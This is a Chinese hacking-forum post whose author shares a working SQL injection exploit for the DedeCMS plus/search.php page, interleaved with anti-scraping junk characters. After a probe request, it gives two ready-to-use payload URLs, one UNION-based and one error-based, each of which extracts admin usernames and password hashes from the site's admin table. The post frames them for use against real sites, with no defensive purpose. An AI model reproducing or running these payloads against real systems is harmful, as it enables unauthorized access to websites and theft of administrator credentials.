转载不加作者名的没JJ% |& _3 W# t3 |: l, w3 Z- l
( I; x1 b$ \" F哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。; d4 m9 t* `# ]: f0 g
* S0 I) x$ ^* [5 W0 ?) Q: g
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
& X! D5 g) c# [6 x6 j# M2 I$ c* K# p# L l
我一般是这样测试的:0 r! O* Z3 D, z1 B# Y: n8 S
7 d% m' H. u( b: e8 T. n
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a. c2 }6 ^9 y5 J) v' W
* `' H. _/ d2 n$ Q转载不加作者名的没JJ
$ I; y, U/ \: v) E7 w8 E D( Y: G' g {$ f
作者:鬼哥
% w* s& L) z5 t. X& o# s2 T3 }0 [7 b8 m; N; W1 u1 Q4 c
) E* Z& P g9 N" @/ c) m* K2 d1 j1 J; X, T
看结果如果提示% }0 |- U! `. D& c( _' D9 D* X
/ Y6 A$ K( k* W6 nSafe Alert: Request Error step 2 !
- N# ]9 X$ g" N9 ]8 u- k, Y
: c) Z# ~9 S& r那么直接用下面的exp. w+ I4 x% n1 z# w1 v
V7 O) K Q1 r Z+ ixx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
" }) k! {) @8 ~; I3 e/ l# N+ J" a& \) M; {9 v1 q: j3 m& E
( s, z- Q* `; n T! V* [" l
看结果如果提示
5 i1 U2 K' F8 W' U7 A
' ^4 ^4 Y2 F$ U3 r$ \Safe Alert: Request Error step 1 !: T6 ?9 C( g' Z: V( ]3 ]7 [
8 ^) J% r0 m" k那么直接用下面的exp& e* @8 |$ @7 \
\) {# ?* @" B1 i1 S1 q
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
6 K* N* v8 l$ d+ B
7 o6 {; g) w t, Z5 H: X
$ y9 z+ ?9 u' ^, {& z9 M如果正常显示证明漏洞不存在了。
. W# O; s9 E! g- f8 a
' I8 ~1 G7 y2 W" D/ t, D8 m7 }; \转载不加作者名的没JJ |